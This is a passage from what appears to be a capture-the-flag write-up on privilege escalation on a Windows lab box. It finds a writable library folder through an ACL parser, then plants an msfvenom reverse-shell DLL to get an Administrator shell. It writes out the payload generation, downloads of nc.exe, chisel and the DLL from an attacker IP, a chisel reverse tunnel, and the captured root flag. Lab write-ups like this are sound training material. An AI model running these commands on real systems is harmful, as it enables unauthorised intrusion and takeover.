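    for ace in aces:
        print(describe(ace))
    print("write-class ACEs for devdoc / Users / Authenticated Users / Everyone:")
    for ace in writable_by(aces, {DEVDOC_SID, "BU", "AU", "WD"}):
        print("  ", describe(ace))
```

The decoded mask 0x1201bf is FR|FW|FX, which is what PowerShell rendered as "Write, ReadAndExecute, Synchronize". The tell is that every other ACE carries the ID flag (inherited from Program Files), while devdoc's does not: someone set it directly on this folder. When hunting on a real host, run the same parser over `(Get-Acl $dir).Sddl` for every directory in the search path of a privileged process and look for explicit write grants to your own SIDs.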
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o rev.dll
---
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload.dll'
*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> cd $ENV:USERPROFILE/Music
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/nc.exe -out nc.exe
Running nc from inside Evil-WinRM kept dying and wouldn't let me interact with the program, and a plain reverse shell died too, so I port-forwarded instead.
└─$ chisel server -p 36000 --reverse
2024/12/07 03:10:00 server: Reverse tunnelling enabled
2024/12/07 03:10:00 server: Fingerprint DsmwtKJ8wgC3MRRu+CQx0Hi3vXD7gk4sO/sUkZnwSeY=
2024/12/07 03:10:00 server: Listening on http://0.0.0.0:36000
---
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/chisel.exe -outfile chisel.exe
*Evil-WinRM* PS C:\Users\devdoc\Music> Start-Job -ScriptBlock { & "C:\Users\devdoc\Music\chisel.exe" client 10.10.14.113:36000 R:100:127.0.0.1:100; }
*Evil-WinRM* PS C:\Users\devdoc\Music> curl 10.10.14.113/rev.dll -out 'C:\Program Files\ReportManagement\Libraries\externalupload2.dll'
---
└─$ nc 0 100
Reports Management administrative console. Type "help" to view available commands.
upload externalupload2
Attempting to upload to external source.
Attempting to upload to external source.
A note on the filename: I typed the wrong name, and `upload externalupload2` still worked. That doesn't prove the name is ignored, though: externalupload.dll from the earlier curl was still sitting in the folder, and the externalupload string in the binary points at a fixed library name. Either way, a DLL we control in Libraries gets loaded when the upload command runs, and the shell comes back as Administrator.

Root.txt
C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
30e84cb378a0d10561d8a130c932509a